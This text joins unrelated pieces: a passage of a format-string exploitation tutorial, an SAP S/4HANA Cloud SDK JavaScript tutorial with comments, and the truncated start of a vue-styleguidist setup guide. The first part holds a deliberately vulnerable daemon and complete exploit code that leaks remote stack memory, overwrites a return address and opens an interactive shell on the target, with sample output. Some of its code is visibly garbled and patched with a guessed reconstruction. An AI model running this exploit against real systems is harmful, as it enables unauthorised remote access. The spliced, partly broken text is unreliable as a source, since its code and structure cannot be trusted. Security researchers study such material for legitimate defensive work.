          exclude: /node_modules/,
          loader: "vue-loader"
        },
        // For js or css files:
        {
          test: /\.js?$/,
          exclude: /node_modules/,
          loader: "babel-loader"
        },
        {
          test: /\.css$/,
          loader: "style-loader!css-loader"
        }
      ]
    }
  }
};
In any case, remember to install the loaders you’re using, at least
vue-loader.
Note that your project doesn’t have to use webpack. You could use other bundlers like Poi or Parcel. Styleguidist uses webpack internally, but it’s only needed for the required loaders.
Documenting a Component
vue-styleguidist will look for components using the glob pattern
src/components/**/*.vue, but you can configure it using the
components key in the styleguide.config.js file:
styleguide.config.js
module.exports = { components: "src/**/*.vue" };
Using the default convention, let’s create the file
src/components/AppButton.vue and paste the following simple component:
AppButton.vue
<template>
  <button :style="styles" @click="handleClick">
    <slot></slot>
  </button>
</template>

<script>
export default {
  name: "app-button",
  props: {
    color: {
      type: String,
      default: "black"
    },
    background: {
      type: String,
      default: "white"
    }
  },
  computed: {
    styles() {
      return {
        color: this.color,
        background: this.background
      };
    }
  },
  methods: {
    handleClick(e) {
      this.$emit("click", e);
    }
  }
};
</script>
The
name component option is required.
Now run
npm run styleguide, and you can navigate to the URL displayed in the console. Out of the box, you’ll see the props are already documented on the component doc.
Keep in mind that only the component's ins and outs must be documented. In Vue.js, those are props, slots and events.
Props
As you could see, props are documented by default using the
type and
default values, but we can add more options by adding JSDoc comments.
For example, we could add a description to the props:
AppButton.vue
{ props: { /** * Sets the button font color */ color: { type: String, default: "black" }, /** * Sets background color of the button */ background: { type: String, default: "white" } } };
We could also mention that the
background property is available since version 1.2.0 by using
@since:
AppButton.vue
{ props: { /** Sets background color of the button * @since 1.2.0 */ background: { type: String, default: "white" } } };
As another example, we can mark a property as deprecated using
@deprecated. That property will look crossed out:
AppButton.vue
{ props: { /** Sets the button font color * @deprecated Use color instead */ oldColor: String } };
Slots
Slots can be documented by using an html-like comment right before the
<slot> tag, using the
@slot doc tag:
AppButton.vue
<template>
  <button :style="styles" @click="handleClick">
    <!-- @slot Use this slot to place the button content -->
    <slot></slot>
  </button>
</template>
You can use as many @slot comments as you have slots, which is especially useful when you use named slots.
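For instance, a sketch with two named slots (the slot names header and footer are made up for illustration) could look like this:

<template>
  <div class="card">
    <!-- @slot Use this slot for the card header -->
    <slot name="header"></slot>
    <!-- @slot Use this slot for the card footer -->
    <slot name="footer"></slot>
  </div>
</template>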
Events
In Vue.js, events are emitted using
this.$emit() function anywhere within methods.
Given that fact, events are documented by adding an
@event comment, and it can be placed anywhere in the method where it’s emitted. They usually go along with
@type in order to define the event payload type.
For clarity, I’d suggest placing them on the method definition:
AppButton.vue
{ methods: { /** Triggered when button is clicked * @event click * @type {Event} */ handleClick(e) { this.$emit("click", e); } } }
If you emit several events, you can place just as many comments:
AppButton.vue
{ methods: { /** Triggered when button is clicked * @event click * @type {Event} */ /** Event for Alligator's example * @event gator * @type {Event} */ handleClick(e) { this.$emit("click", e); this.$emit("gator", e); } } }
Mixins
Mixins are objects which can contain props, methods and other logic to share between components.
Aside from documenting their props and events, they must include a
@mixin doc tag in order to be recognized by vue-styleguidist.
For example, let’s create the following mixin:
sizeMixin.js
/** * @mixin */ export default { props: { /** * Set size of the element */ size: { type: String, default: "14px" } } };
And use it in the AppButton.vue component:
AppButton.vue
import sizeMixin from "./sizeMixin"; export default { name: "app-button", mixins: [sizeMixin], //... }
Then, if you still have the styleguidist server running, you’ll see that the
size prop got merged with the AppButton props.
Extended Docs and Examples
There are a few ways to add more docs to the component:
- Adding a Readme.md file, if your component is within its own folder.
- Adding a .md file with the same file name of the component.
- Adding a <docs>...</docs> tag on the .vue file.
Since I like the approach and atomicity of single file components, I’m going for the option of using the
<docs> tag. But you could choose the one you feel most comfortable with, the result is the same.
In there, you can add any static information, but the real potential is with examples. You can create an interactive example of the component just by adding the code like you’d do it in a markdown file.
The simplest form is by tagging the code blocks as
jsx:
```jsx
<app-button>Push Me</app-button>
```
And for more complex examples, you could create your own vue instance, tagged as
js:
```js
new Vue({
  data: () => ({ message: '' }),
  template: `
    <div>
      <app-button>
        Push Me
      </app-button>
      {{message}}
    </div>
  `
})
```
Let’s therefore add a few examples to our
AppButton component:
<docs>
This button is amazing, use it responsibly.

## Examples

Orange button:

```jsx
<app-button background="orange">Push Me</app-button>
```

Ugly button with pink font and blue background:

```jsx
<app-button color="pink" background="blue">
  Ugly button
</app-button>
```

Button containing custom tags:

```jsx
<app-button>
  Text with <b>bold</b>
</app-button>
```
</docs>
Wrapping Up
vue-styleguidist gives us a very easy and automated way to add docs to our components, ending up in a fully featured interactive style guide that other developers and designers can use and play around with.
You can download the complete example from this github repo.
Stay cool 🦄
|
https://alligator.io/vuejs/vue-styleguidist/
|
CC-MAIN-2019-35
|
en
|
refinedweb
|
strnicmp()
Compare two strings up to a given length, ignoring case
Synopsis:
#include <string.h> int strnicmp( const char* s1, const char* s2, size_t len );
Since:
BlackBerry 10.0.0
Arguments:
- s1, s2
- The strings that you want to compare.
- len
- The maximum number of characters that you want to compare.
Library:
libc
Use the -l c option to qcc to link against this library. This library is usually included automatically.
Description:
The strnicmp() function compares up to len characters from the strings pointed to by s1 and s2, ignoring case.
Returns:
- < 0
- s1 is less than s2.
- 0
- s1 is equal to s2.
- > 0
- s1 is greater than s2.
Examples:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main( void )
{
    printf( "%d\n", strnicmp( "abcdef", "ABCXXX", 10 ) );
    printf( "%d\n", strnicmp( "abcdef", "ABCXXX", 6 ) );
    printf( "%d\n", strnicmp( "abcdef", "ABCXXX", 3 ) );
    printf( "%d\n", strnicmp( "abcdef", "ABCXXX", 0 ) );
    return EXIT_SUCCESS;
}

produces the output:

-20
-20
0
0
Last modified: 2014-06-24
|
https://developer.blackberry.com/native/reference/core/com.qnx.doc.neutrino.lib_ref/topic/s/strnicmp.html
|
CC-MAIN-2019-35
|
en
|
refinedweb
|
Free Chapter from "Scala in Depth": Using None instead of Null
Joshua D. Suereth
An Option can be considered a container of something or nothing. This is done through the two subclasses of Option: Some and None. In this article from chapter 2 of Scala in Depth, author Joshua Suereth discusses advanced Option techniques.
Using None instead of Null
Scala does its best to discourage the use of null in general programming. It does this through the scala.Option class found in the standard library. An Option can be considered a container of something or nothing. This is done through the two subclasses of Option: Some and None. Some denotes a container of exactly one item. None denotes an empty container, a role similar to what Nil plays for List.
In Java and other languages that allow null, null is often used as a placeholder to denote a nonfatal error as a return value or to denote that a variable is not yet initialized. In Scala, you can denote this through the None subclass of Option. Conversely, you can denote an initialized or nonfatal variable state through the Some subclass of Option. Let’s take a look at the usage of these two classes.
Listing 1 Simple usage of Some and None
scala> var x : Option[String] = None #1
x: Option[String] = None
scala> x.get #2
java.util.NoSuchElementException: None.get in
scala> x.getOrElse("default") #3
res0: String = default
scala> x = Some("Now Initialized") #4
x: Option[String] = Some(Now Initialized)
scala> x.get #5
res0: java.lang.String = Now Initialized
scala> x.getOrElse("default") #6
res1: java.lang.String = Now Initialized
#1 Create uninitialized String variable
#2 Access uninitialized throws exception
#3 Access using default
#4 Initialize x with a string
#5 Access initialized variable works
#6 Default is not used
An Option containing no value can be constructed via the None object. An Option that contains a value is created via the Some factory method. Option provides many ways of retrieving values from its inside. Of particular use are the get and getOrElse methods. The get method will attempt to access the value stored in an Option and throw an exception if it is empty. This is very similar to accessing nullable values within other languages. The getOrElse method will attempt to access the value stored in an Option, if one exists, otherwise it will return the value supplied to the method. You should always prefer getOrElse over using get.
Scala provides a factory method on the Object companion object that will convert from a Java style reference—where null implies an empty variable—into an Option where this is more explicit. Let’s take a quick look.
Listing 2 Usage of the Option factory
scala> var x : Option[String] = Option(null) x: Option[String] = None scala> x = Option("Initialized") x: Option[String] = Some(Initialized)
The Option factory method will take a variable and create a None object if the input was null, or a Some if the input was initialized. This makes it rather easy to take inputs from an untrusted source, such as another JVM language, and wrap them into Options. You might be asking yourself why you would want to do this. Isn’t checking for null just as simple in code? Well, Option provides a few more advanced features that make it far more ideal then simply using if null checks.
Advanced Option techniques
The greatest feature of Option is that you can treat it as a collection. This means you can perform the standard map, flatMap, and foreach methods and utilize them inside a for expression. Not only does this help to ensure a concise syntax, but it also opens up a variety of different methods for handling uninitialized values.
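As a quick illustration (not one of the book's numbered listings), map and getOrElse can be chained to transform an optional value without ever touching null:

val input : Option[String] = Some("Scala")
val length : Option[Int] = input.map(s => s.length)          // Some(5)
val display : String = length.map(_.toString).getOrElse("unknown")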
Let’s take a look at some common Null-related issues solved using Option, starting with creating an object or returning a default.
Creating a new object or returning a default
Many times, you need to construct something with some other variable or supply some sort of default. Let’s pretend that we have an application that requires some kind of temporary file storage for its execution. The application is designed so that a user may be able to specify a directory to store temporary files on the command line. If the user does not specify a new file, if the argument provided by the user is not a real directory, or they did not provide a directory, then we want to return a sensible default temporary directory. Let’s create a method that will give our temporary directory.
Listing 3 Creating an object or returning a default
def getTemporaryDirectory(tmpArg : Option[String]) : java.io.File = { tmpArg.map(name => new java.io.File(name)). filter(_.isDirectory). getOrElse(new java.io.File(System.getProperty("java.io.tmpdir"))) }
#1 Create if defined
#2 Only directories
#3 Specify Default
The getTemporaryDirectory method takes the command line parameter as an Option containing a String and returns a File object referencing the temporary directory we should use. The first thing we do is use the map method on Option to create a java.io.File if there was a parameter. Next, we make sure that this newly constructed file object is a directory. To do that, we use the filter method. This will check whether the value in an Option abides by some predicate and, if not, convert to a None. Finally, we check to see if we have a value in the Option; otherwise, we return the default temporary directory.
This enables a very powerful set of checks without resorting to nested if statements or blocks. There are times where we would like a block, such as when we want to execute a block of code based on the availability of a particular parameter.
Executing block of code if variable is initialized
Option can be used to execute a block of code if the Option contains a value. This is done through the foreach method, which, as expected, iterates over all the elements in the Option. As an Option can only contain zero or one value, this means the block either executes or is ignored. This syntax works particularly well with for expressions. Let's take a quick look.
Listing 4 Executing code if option is defined
val username : Option[String] = ... for(uname <- username) { println("User: " + uname) }
As you can see, this looks like a normal "iterate over a collection" control block. The syntax remains quite similar when we need to iterate over several variables. Let’s look at the case where we have some kind of Java Servlet framework and we want to be able to authenticate users. If authentication is possible, we want to inject our security token into the HttpSession so that later filters and servlets can check access privileges for this user.
Listing 5 Executing code if several options are defined
def authenticateSession(session : HttpSession, username : Option[String], password : Option[Array[Char]]) = { for(u <- username; p <- password; if canAuthenticate(username, password)) { #1 val privileges = privilegesFor(u) #2 injectPrivilegesIntoSession(session, privileges) } }
#1 Conditional logic
#2 No need for Option
Notice that you can embed conditional logic in a for expression. This helps keep less nested logical blocks within your program. Another important consideration is that all the helper methods do not need to use the Option class.
Option works as a great front-line defense for potentially uninitialized variables; however, it does not need to pollute the rest of your code. In Scala, Option as an argument implies that something may not be initialized—its convention to make the opposite true, that is: functions should not be passed as null or uninitialized parameters.
Scala’s for expression syntax is rather robust, even allowing you to produce values rather than execute code blocks. This is especially handy when you have a set of potentially uninitialized parameters that you want to transform into something else.
Using several potential uninitialized variables to construct another variable
Sometimes we want to transform a set of potentially uninitialized values so that we only have to deal with one. To do this, we’re going to use a for expression again, but this time using a yield. Let’s look at the case where a user has input some database credentials or we attempted to read them from an encrypted location and we want to create a database connection using these parameters. We don’t want to deal with failure in our function because this is a utility function that will not have access to the user. In this case, we’d like to just transform our database connection configuration parameters into a single option containing our database.
Listing 6 Merging options
def createConnection(conn_url : Option[String], conn_user : Option[String], conn_pw : Option[String]) : Option[Connection] = for { url <- conn_url user <- conn_user pw <- conn_pw } yield DriverManager.getConnection(url, user, pw)
This function does exactly what we need it to. It does seem though that we are merely deferring all logic to DriverManager.getConnection. What if we wanted to abstract this such that we can take any function and create one that is option friendly in the same manner? Take a look at what we’ll call the lift function:
Listing 7 Generically converting functions
scala> def lift3[A,B,C,D](f : Function3[A,B,C,D]) : Function3[Option[A], Option[B], Option[C], Option[D]] = | (oa : Option[A], ob : Option[B], oc : Option[C]) => | for(a <- oa; b <- ob; c <- oc) yield f(a,b,c) | } lift3: [A,B,C,D](f: (A, B, C) => D)(Option[A], Option[B], Option[C]) => Option[D] scala> lift3(DriverManager.getConnection) #1 res4: (Option[java.lang.String], Option[java.lang.String], Option[java.lang.String])
#1 Using lift3 directly
The lift3 method looks somewhat like our earlier createConnection method, except that it takes a function as its sole parameter. As you can see from the REPL output, we can use this against existing functions to create Option-friendly functions. We’ve directly taken the DriverManager.getConnection method and lifted it into something that is semantically equivalent to our earlier createConnection method. This technique works well when used with the encapsulation of uninitialized variables. You can write most of your code, even utility methods, assuming that everything is initialized, and then lift these functions into Option-friendly versions as appropriate.
Summary
Scala provides a class called Option that allows developers to relax the amount of protection they need when dealing with null. Option can help to improve the reasonability of the code by clearly delineating where uninitialized values are accepted.
Last updated: August 15, 2011
Opinions expressed by DZone contributors are their own.
|
https://dzone.com/articles/free-chapter-scala-depth-using
|
CC-MAIN-2019-35
|
en
|
refinedweb
|
VueFace
VueFace is an open source component library for VueJS framework with around 40 components at the moment. It supports 20+ themes for giving different look & feel for all the components.
Follow me @SudheerJonna for technical updates.
Install
VueFace is available in NPM and you can add to your project as a dependency as below
npm install --save vueface
Quick start
The VueFace library need to be configured before going to use the components
import Vue from 'vue' import VueFace from 'vueface' Vue.use(VueFace)
Configure styles for your components in your home.vue/index.html. Forexample, add below resources to home.vue as below
<style id="current-theme" lang="css" src="node_modules/src/assets/themes/omega/theme.css"></style> <style lang="css" src="node_modules/src/assets/vue-face.css"></style> <style lang="css" src="node_modules/font-awesome/css/font-awesome.min.css"></style>
Demo
The showcase is available here for each component and its features.
How to Run
build for production with minification
npm run build
serve with hot reload at localhost:8080
npm start
LICENSE
MIT
|
https://nicedoc.io/sudheerj/vueface
|
CC-MAIN-2019-35
|
en
|
refinedweb
|
img_decode_validate()
Find a codec for decoding
Synopsis:
#include <img/img.h> int img_decode_validate( const img_codec_t* codecs, size_t ncodecs, io_stream_t* input, unsigned* codec );
Arguments:
- codecs
- A pointer to an array of img_codec_t handles providing a list of codecs to try. The function will try each codec in order until it finds one that validates the data in the stream.
- ncodecs
- The number of items in the codecs array.
- input
- The input source.
- codec
- The address of an unsigned value where the function stores the index of the codec that validated the datastream. This memory is left untouched if no such codec is found.
Library:
libimg
Use the -l img option to qcc to link against this library.
Description:
This function finds a suitable codec for decoding.
Returns:
Status of the operation:
- IMG_ERR_OK
- Success; an appropriate codec was found. Check codec for the index of the codec in the codecs array which validated the datastream.
- IMG_ERR_DLL
- An error occurred processing the DLL that handles the file type. Check to make sure that the DLL is not missing or corrupt.
- IMG_ERR_FORMAT
- No installed codec recognized the input data as a format it supports. This could mean the data is of a format that's not supported, or the datastream is corrupt.
- IMG_ERR_NOTIMPL
- The codec that recognized the input data as the format it supports doesn't have a validate method.
Classification:
Image library
|
http://developer.blackberry.com/playbook/native/reference/com.qnx.doc.neutrino.lib_ref/topic/i/img_decode_validate.html
|
CC-MAIN-2019-35
|
en
|
refinedweb
|
Azure Kubernetes Service (AKS) makes it simple to deploy a managed Kubernetes cluster in Azure. AKS reduces the complexity and operational overhead of managing Kubernetes by offloading much of that responsibility to Azure.
You can create an AKS cluster in the Azure portal, with the Azure CLI, or template driven deployment options such as Resource Manager templates and Terraform. When you deploy an AKS cluster, the Kubernetes master and all nodes are deployed and configured for you. Additional features such as advanced networking, Azure Active Directory integration, and monitoring can also be configured during the deployment process. Windows Server containers support is currently in preview in AKS.
For more information on Kubernetes basics, see Kubernetes core concepts for AKS.
To get started, complete the AKS quickstart in the Azure portal or with the Azure CLI.
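For orientation, creating a basic cluster with the Azure CLI looks roughly like the following; the resource group name, cluster name, and location are placeholders, and the exact options you need may differ for your scenario:

az group create --name myResourceGroup --location eastus
az aks create --resource-group myResourceGroup --name myAKSCluster --node-count 1 --generate-ssh-keys
az aks get-credentials --resource-group myResourceGroup --name myAKSCluster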
Access, security, and monitoring
For improved security and management, AKS lets you integrate with Azure Active Directory and use Kubernetes role-based access controls. You can also monitor the health of your cluster and resources.
Identity and security management
To limit access to cluster resources, AKS supports Kubernetes role-based access control (RBAC). RBAC lets you control access to Kubernetes resources and namespaces, and permissions to those resources. You can also configure an AKS cluster to integrate with Azure Active Directory (AD). With Azure AD integration, Kubernetes access can be configured based on existing identity and group membership. Your existing Azure AD users and groups can be provided access to AKS resources and with an integrated sign-on experience.
For more information on identity, see Access and identity options for AKS.
To secure your AKS clusters, see Integrate Azure Active Directory with AKS.
Integrated logging and monitoring
To understand how your AKS cluster and deployed applications are performing, Azure Monitor for container health collects memory and processor metrics from containers, nodes, and controllers. Container logs are available, and you can also review the Kubernetes master logs. This monitoring data is stored in an Azure Log Analytics workspace, and is available through the Azure portal, Azure CLI, or a REST endpoint.
For more information, see Monitor Azure Kubernetes Service container health.
Clusters and nodes
AKS nodes run on Azure virtual machines. You can connect storage to nodes and pods, upgrade cluster components, and use GPUs. AKS supports Kubernetes clusters that run multiple node pools to support mixed operating systems and Windows Server containers (currently in preview). Linux nodes run a customized Ubuntu OS image, and Windows Server nodes run a customized Windows Server 2019 OS image.
Cluster node and pod scaling
As demand for resources change, the number of cluster nodes or pods that run your services can automatically scale up or down. You can use both the horizontal pod autoscaler or the cluster autoscaler. This approach to scaling lets the AKS cluster automatically adjust to demands and only run the resources needed.
For more information, see Scale an Azure Kubernetes Service (AKS) cluster.
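As a sketch, manually changing the node count with the Azure CLI could look like this (resource group and cluster names are placeholders):

az aks scale --resource-group myResourceGroup --name myAKSCluster --node-count 3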
Cluster node upgrades
Azure Kubernetes Service offers multiple Kubernetes versions. As new versions become available in AKS, your cluster can be upgraded.
Storage volume support
To support application workloads, you can mount storage volumes for persistent data. Both static and dynamic volumes can be used. Depending on how many connected pods are to share the storage, you can use storage backed by Azure Disks or Azure Files. An AKS cluster can also be deployed into an existing virtual network, where each pod is assigned an IP address and can communicate directly with other pods and nodes in the virtual network. Pods can also connect to other services in a peered virtual network, and to on-premises networks over ExpressRoute or site-to-site (S2S) VPN connections.
For more information, see the Network concepts for applications in AKS.
To get started with ingress traffic, see HTTP application routing.
Ingress with HTTP application routing
The HTTP application routing add-on makes it easy to access applications deployed to your AKS cluster. When enabled, the HTTP application routing solution configures an ingress controller in your AKS cluster. As applications are deployed, publicly accessible DNS names are automatically configured.

Development tooling integration

Kubernetes has a rich ecosystem of development and management tools such as Helm, Draft, and the Kubernetes extension for Visual Studio Code. These tools work seamlessly with AKS.
Additionally, Azure Dev Spaces provides a rapid, iterative Kubernetes development experience for teams. With minimal configuration, you can run and debug containers directly in AKS. To get started, see Azure Dev Spaces.
The Azure DevOps project provides a simple solution for bringing existing code and Git repository into Azure. The DevOps project automatically creates Azure resources such as AKS, a release pipeline in Azure DevOps Services that includes a build pipeline for CI, sets up a release pipeline for CD, and then creates an Azure Application Insights resource for monitoring.
For more information, see Azure DevOps project.
Docker image support and private container registry
AKS supports the Docker image format. For private storage of your Docker images, you can integrate AKS with Azure Container Registry (ACR).
To create private image store, see Azure Container Registry.
Kubernetes certification
Azure Kubernetes Service (AKS) has been CNCF certified as Kubernetes conformant.
Regulatory compliance
Azure Kubernetes Service (AKS) is compliant with SOC, ISO, PCI DSS, and HIPAA. For more information, see Overview of Microsoft Azure compliance.
Next steps
Learn more about deploying and managing AKS with the Azure CLI quickstart.
|
https://docs.microsoft.com/en-us/azure/aks/intro-kubernetes?WT.mc_id=THOMASMAURER-blog-thmaure
|
CC-MAIN-2019-35
|
en
|
refinedweb
|
I've got a problem setting a texture from an image on a sphere. The problem is that texture.Load or texture.SetData always returns false. I did try different methods like SetData, Load, resizing the texture and image (to power-of-2 dimensions), and so on, but none of them worked. Here is my code:
async void CreateScene()
{
    Input.SubscribeToTouchEnd(OnTouched);

    _scene = new Scene();
    _octree = _scene.CreateComponent<Octree>();
    _plotNode = _scene.CreateChild();

    var baseNode = _plotNode.CreateChild().CreateChild();
    var plane = baseNode.CreateComponent<StaticModel>();
    plane.Model = CoreAssets.Models.Sphere;

    var cameraNode = _scene.CreateChild();
    _camera = cameraNode.CreateComponent<Camera>();
    cameraNode.Position = new Vector3(10, 15, 10) / 1.75f;
    cameraNode.Rotation = new Quaternion(-0.121f, 0.878f, -0.305f, -0.35f);

    Node lightNode = cameraNode.CreateChild();
    var light = lightNode.CreateComponent<Light>();
    light.LightType = LightType.Point;
    light.Range = 100;
    light.Brightness = 1.3f;

    int size = 3;
    baseNode.Scale = new Vector3(size * 1.5f, 1, size * 1.5f);

    var imageStream = await new HttpClient().GetStreamAsync("some 512 * 512 jpg image");
    var ms = new MemoryStream();
    imageStream.CopyTo(ms);

    var image = new Image();
    var isLoaded = image.Load(new MemoryBuffer(ms));
    if (!isLoaded)
    {
        throw new Exception();
    }

    var texture = new Texture2D();
    //var isTextureLoaded = texture.Load(new MemoryBuffer(ms.ToArray()));
    var isTextureLoaded = texture.SetData(image);
    if (!isTextureLoaded)
    {
        throw new Exception();
    }

    var material = new Material();
    material.SetTexture(TextureUnit.Diffuse, texture);
    material.SetTechnique(0, CoreAssets.Techniques.Diff, 0, 0);
    plane.SetMaterial(material);

    try
    {
        await _plotNode.RunActionsAsync(new EaseBackOut(new RotateBy(2f, 0, 360, 0)));
    }
    catch (OperationCanceledException) { }
}
Please help!
@ShahramShobeiri
For me the below works. As an image I used this (put to my Assets/Data/Textures folder).
using Urho;
using Urho.Shapes;

var app = SimpleApplication.Show(new ApplicationOptions("Data") { Width = 1280, Height = 800 });
app.Viewport.SetClearColor(Color.Black);
app.Renderer.MaterialQuality = 15;

var sphere = app.RootNode.GetOrCreateComponent<Sphere>();
var i = app.ResourceCache.GetImage("Textures/world.topo.bathy.200401.3x5400x2700.png");
var m = Material.FromImage(i);
sphere.SetMaterial(m);
@puneetmahali
Nothing to explain. There are use cases when storing resources (images, textures, etc) is better than manage images dynamically.
But below is an (not optimized) example, how to download the image and use it as texture/material on the fly:
using Urho;
using Urho.Resources;
using Urho.Shapes;
using System.Net;
using System.Text;

var url = "";
var wc = new WebClient() { Encoding = Encoding.UTF8 };

var app = SimpleApplication.Show(new ApplicationOptions("Data") { Width = 1280, Height = 800 });
app.Viewport.SetClearColor(Color.Black);
app.Renderer.MaterialQuality = 15;

try
{
    var mb = new MemoryBuffer(wc.DownloadData(url));
    var sphere = app.RootNode.GetOrCreateComponent<Sphere>();
    var img = new Urho.Resources.Image(app.Context) { Name = "MyImage" };
    img.Load(mb);
    var m = Material.FromImage(img);
    sphere.SetMaterial(m);
}
catch (Exception ex)
{
    // do something when an error occurs
}
Answers
Hi Shahram,
Can you please send the full project?
Hi @puneetmahali,
Here is the full project:
What about to use Material.FromImage(string) method?
Thanks @laheller
It didn't work either. After Material.FromImage(string), the sphere disappears and everything goes black.
@ShahramShobeiri
For me the below works. As an image I used this (put to my Assets/Data/Textures folder).
@laheller
Can you please explain more about "put to my Assets/Data/Textures folder"? If the image will be fetched from a URL, then why do we need to put the image into the folder as well? I want to show multiple images, i.e. load them dynamically.
@laheller
It would be so helpful If you share the working demo project.
@puneetmahali
Nothing to explain. There are use cases when storing resources (images, textures, etc) is better than manage images dynamically.
But below is an (not optimized) example, how to download the image and use it as texture/material on the fly:
@laheller
Thanks for quick reply.
Sounds Cool.
Is the above solution working/executable for both means iOS & Android for you?
Because it's not working and shows an error like "failed to add resource path 'Data', check the documentation". I already set the build action to BundleResource for iOS and EmbeddedResource for Android.
So, It would be so helpful if you can share the executable demo.
Thanks in advance.
@puneetmahali
The app in my example is an instance of Urho.Application or Urho.SimpleApplication.
You have to create your one and use the rest from my example.
It should work on all platforms because of Xamarin
Thank you @laheller, You helped a lot,
My main goal was to create a 360 degree image viewer, I found a NuGet (Swank.FormsPlugin) for this goal but it didn't work for me, So based on Swank.FormsPlugin and @laheller solution, I created a very simple project to show 360 degree images that works!
Here is the project for @laheller
@ShahramShobeiri
This is not working on iOS; it gives the OpenGL error "Error: Could not create OpenGL context, root cause 'failed to create OpenGL ES drawable'".
@puneetmahali
Is my second example working for you?
BTW I never tried any Xamarin.IOS, I develop only for Windows and Android.
Actually I am working on indoor maps. I want to load the 2D indoor map images into a 3D viewer with 360-degree movement. I am using a texture with the Sphere shape, but it's not displayed in full screen, and a light shade also appears.
Can you please help me to solve this problem.
Here is my example-
@puneetmahali
Are you working on a Windows Forms/WPF application, while you have no fullscreen?
If yes, you have to initialize your app using ApplicationOptions class.
Regarding to the second problem "light shade also come" please run your current app, make a screenshot and post it here, because it is not clear for me, what is the problem.
@laheller
I am not familiar with Xamarin.iOS; I've never used it.
I only develop on Xamarin.Android and WinForms platforms.
On Android if you want:
1. Fullscreen app in general, you have to specify a theme without ActionBar for your activity, for example @android:style/Theme.Holo.Light.NoActionBar or your custom style where you disable actionbar.
Then the whole device screen will be available for Activity layout(s) or other view.
2. For UrhoSharp you have to create the UrhoSurface within a fullscreen layout.
BTW I can't see your screenshots here.
Sorry @puneetmahali, I never tried any Xamarin.IOS, but it works on Android without problem.
One more thing, in the sample project, if you want to load image from URL it's better to use
var mb = new MemoryBuffer(wc.DownloadData(new Uri(url)));
because
var mb = new MemoryBuffer(wc.DownloadData(url));
didn't work for me.
@laheller
I still cannot see your screenshots.
Upload them somewhere and share the links here.
@laheller @ShahramShobeiri
We have some Urho shapes(Urho.Shapes) like Box, Sphere, Plane, Cone, Cylinder, Dome.....etc etc.
So I need to create a Static Component and loads the models into the above shape like below-
var plane = baseNode.CreateComponent();
plane.Model = CoreAssets.Models.Box;
That box provides the 3D view but now I want to load the image in a Square like a Simple ImageView through the texture. So, Which shapes will give me that shape also needs to think about Vector3 position who returns the view in the center.
Make it more Simple- I need to load an Image with texture in 2D view like a normal ImageView(square shape) in Xamarin.forms and It should work for both in iOS & Android.
@puneetmahali
Still not sure, what is your goal.
You want to display a Box shape and render different textures on its 6 surfaces?
@laheller
Are you able to download the Images?
No, I want to display the Image in a square shape and render different textures without 6 surfaces.
Please check your personal message also.
@puneetmahali
Then you have to:
Finally you have to transform (Rotate/Translate/Scale) your node to the final orientation/position/size.
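As a rough sketch of that last step (the node name, position, rotation, and scale values below are arbitrary placeholders, not values from this thread):

var node = app.RootNode.CreateChild("imageNode");
node.Position = new Vector3(0, 0, 5);        // move it in front of the camera
node.Rotation = new Quaternion(0, 1, 0, 0);  // quaternion for a 180-degree turn around Y
node.Scale = new Vector3(4, 3, 1);           // roughly a 4:3 "image" shape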
|
https://forums.xamarin.com/discussion/comment/345197/
|
CC-MAIN-2019-35
|
en
|
refinedweb
|
Add-Member
Syntax
Add-Member -InputObject <PSObject> -TypeName <String> [-PassThru] [<CommonParameters>]
Add-Member [-MemberType] <PSMemberTypes> [-Name] <String> [[-Value] <Object>] [[-SecondValue] <Object>] -InputObject <PSObject> [-TypeName <String>] [-Force] [-PassThru] [<CommonParameters>]
Description
The
Add-Member cmdlet lets you add members (properties and methods) to an instance of a PowerShell
object. For instance, you can add a NoteProperty member that contains a description of the object or
a ScriptMethod member that runs a script to change the object.
To use
Add-Member, pipe the object to
Add-Member, or use the InputObject parameter to
specify the object.
The MemberType parameter indicates the type of member that you want to add. The Name parameter assigns a name to the new member, and the Value parameter sets the value of the member.
Beginning in Windows PowerShell 3.0, the PassThru parameter, which generates an output
object, is needed less frequently.
Add-Member now adds the new members directly to the input
object of more types. For more information, see the PassThru parameter description.
Examples
Example 1: Add a note property to a PSObject
The following example adds a Status note property with a value of "Done" to the FileInfo
object that represents the
Test.txt file.
The first command uses the
Get-ChildItem cmdlet to get a FileInfo object representing".
$A = Get-ChildItem c:\ps-test\test.txt
$A | Add-Member -NotePropertyName Status -NotePropertyValue Done
$A.Status

Done
Example 2: Add an alias property to a PSObject
The following example adds a Size alias property to the object that represents the
Test.txt
file. The new property is an alias for the Length property.
The first command uses the
Get-ChildItem cmdlet to get the
Test.txt FileInfo object.
The second command adds the Size alias property. The third command uses dot notation to get the value of the new Size property.
$A = Get-ChildItem C:\Temp\test.txt
$A | Add-Member -MemberType AliasProperty -Name Size -Value Length
$A.Size

2394
Example 3: Add a StringUse note property to a string
This example adds the StringUse note property to a string.
Because
Add-Member cannot add types to String input objects, you can specify the PassThru
parameter to generate an output object. The last command in the example displays the new property.
This example uses the NotePropertyMembers parameter. The value of the NotePropertyMembers parameter is a hash table. The key is the note property name, StringUse, and the value is the note property value, Display.
$A = "A string"
$A = $A | Add-Member -NotePropertyMembers @{StringUse="Display"} -PassThru
$A.StringUse

Display
Example 4: Add a script method to a FileInfo object
This example adds the SizeInMB script method to a FileInfo object which calculates the
file size to the nearest MegaByte. The second command creates a ScriptBlock that uses the
Round static method from the
[math] type to round the file size to the second decimal place.
The Value parameter also uses the
$This automatic variable, which represents the current
object. The
$This variable is valid only in script blocks that define new properties and methods.
The last command uses dot notation to call the new SizeInMB script method on the object in the
$A variable.
$A = Get-ChildItem C:\Temp\test.txt
$S = {[math]::Round(($this.Length / 1MB), 2)}
$A | Add-Member -MemberType ScriptMethod -Name "SizeInMB" -Value $S
$A.SizeInMB()

0.43
Example 5: Copy all properties of an object to another
This function copies all of the properties of one object to another object. The value is copied using the Value parameter. It uses the Force parameter
to add members with the same member name.
function Copy-Property ($From, $To)
{
    $properties = Get-Member -InputObject $From -MemberType Property
    foreach ($p in $properties)
    {
        $To | Add-Member -MemberType NoteProperty -Name $p.Name -Value $From.$($p.Name) -Force
    }
}
Example 6: Create a custom object
This example creates an Asset custom object.
The
New-Object cmdlet creates a PSObject. The example saves the PSObject in the
$Asset
variable.
The second command uses the
[ordered] type accelerator to create an ordered dictionary of names
and values. The command saves the result in the
$D variable.
The third command uses the NotePropertyMembers parameter of the
Add-Member cmdlet to add the
dictionary in the
$D variable to the PSObject.
The TypeName property assigns a new name, Asset, to the PSObject.
The last command pipes the new Asset object to the
Get-Member
cmdlet. The output shows that the object has a type name of Asset and the note properties that
we defined in the ordered dictionary.
$Asset = New-Object -TypeName PSObject
$d = [ordered]@{Name="Server30";System="Server Core";PSVersion="4.0"}
